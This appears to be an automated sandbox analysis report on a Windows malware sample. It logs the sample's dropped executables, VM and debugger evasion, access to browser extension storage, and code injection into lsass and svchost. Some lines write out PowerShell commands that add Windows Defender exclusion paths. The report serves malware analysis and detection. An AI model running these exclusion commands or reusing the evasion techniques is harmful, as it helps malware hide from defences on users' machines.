Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2028	Thread sleep count: 2450 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1216	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4108	Thread sleep count: 7131 > 30
Source: C:\Windows\System32\svchost.exe TID: 4108	Thread sleep time: -7131000s >= -30000s

Source: C:\ProgramData\main.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF6CEB38670
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB28D00 FindFirstFileExW,FindClose,	0_2_00007FF6CEB28D00
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF6CEB38670
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB426C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6CEB426C4
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_0036C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	5_2_0036C4A8
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_0037E560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	5_2_0037E560
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647787F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	6_2_00007FF647787F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647787F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	6_2_00007FF647787F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647791FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	6_2_00007FF647791FE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647778B00 FindFirstFileExW,FindClose,	6_2_00007FF647778B00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB88DCE0 FindFirstFileExW,	7_2_00000235BB88DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	7_2_00007FF7DFD38670
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD28D00 FindFirstFileExW,FindClose,	7_2_00007FF7DFD28D00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD38670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	7_2_00007FF7DFD38670
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD426C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	7_2_00007FF7DFD426C4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB8874DCE0 FindFirstFileExW,	8_2_000001EB8874DCE0

Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe

Code function: 5_2_00380B80 VirtualQuery,GetSystemInfo,

5_2_00380B80

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599844
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599558
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599406
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599275
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599094
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598950
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598837
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598656
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598498
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598370
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598234
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598103
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597984
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597874
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597746
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597629
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597468
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597148
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597031
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596918
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596783
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596656
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596505
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596375
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596249
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596131
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596011
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595902
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595781
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595672
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595562
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595453
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def	Jump to behavior

Source: Build.exe, 00000005.00000002.1875260545.00000000095E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}M
Source: main.exe, 00000015.00000002.1999999146.0000025EB809E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: main.exe, 00000015.00000002.1999999146.0000025EB809E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	Binary or memory string: PreventStartOnVirtualMachine
Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: based.exe, 00000008.00000002.2123124196.000001EB87080000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: Build.exe, 00000005.00000002.1872849445.0000000009453000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\N
Source: main.exe, 00000015.00000002.1995297484.0000025EB6172000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwarec
Source: based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservicera
Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	Binary or memory string: VMwareVBox
Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice

Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe

API call chain: ExitProcess graph end node

graph_5-26232

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Anti Debugging

Hides threads from debuggers

Source: C:\ProgramData\svchost.exe

Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe

Code function: 0_2_00007FF6CEB2C8BC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF6CEB2C8BC

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe

Code function: 2_2_00007FFDFB3C2F20 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FFDFB3C2F20

Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe

Code function: 5_2_0038A640 mov eax, dword ptr fs:[00000030h]

5_2_0038A640

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe

Code function: 0_2_00007FF6CEB442D0 GetProcessHeap,

0_2_00007FF6CEB442D0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\ProgramData\main.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB2C030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF6CEB2C030
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB2C8BC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6CEB2C8BC
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB3B3CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6CEB3B3CC
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB2CA9C SetUnhandledExceptionFilter,	0_2_00007FF6CEB2CA9C
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 2_2_00007FFE1A460AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFE1A460AA8
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_0038215D SetUnhandledExceptionFilter,	5_2_0038215D
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_003812D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_003812D7
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_0038647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_0038647F
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00381FCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00381FCA
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF64777C860 SetUnhandledExceptionFilter,	6_2_00007FF64777C860
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF64777C67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00007FF64777C67C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF64777BDE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FF64777BDE0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF64778ACD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00007FF64778ACD8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB88D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000235BB88D2A4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB887D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000235BB887D90
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD2C8BC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF7DFD2C8BC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD2C030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FF7DFD2C030
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD3B3CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF7DFD3B3CC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF7DFD2CA9C SetUnhandledExceptionFilter,	7_2_00007FF7DFD2CA9C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB88747D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001EB88747D90
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB8874D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001EB8874D2A4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB9B3034 IsProcessorFeaturePresent,00007FFE1A461730,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE1A461730,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FFDFB9B3034
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE00762126 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FFE00762126
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE00761CB7 SetUnhandledExceptionFilter,	8_2_00007FFE00761CB7
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFE007DCE3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FFE007DCE3C

Source: C:\ProgramData\main.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\ProgramData\svchost.exe	Network Connect: 216.58.212.132 80
Source: C:\ProgramData\svchost.exe	Network Connect: 185.199.109.133 443

Adds a directory exclusion to Windows Defender

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'	Jump to behavior
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAF1B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B5645B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2108BCE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29166930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 19E27BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B550000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: 87C0000 protect: page execute and read and write
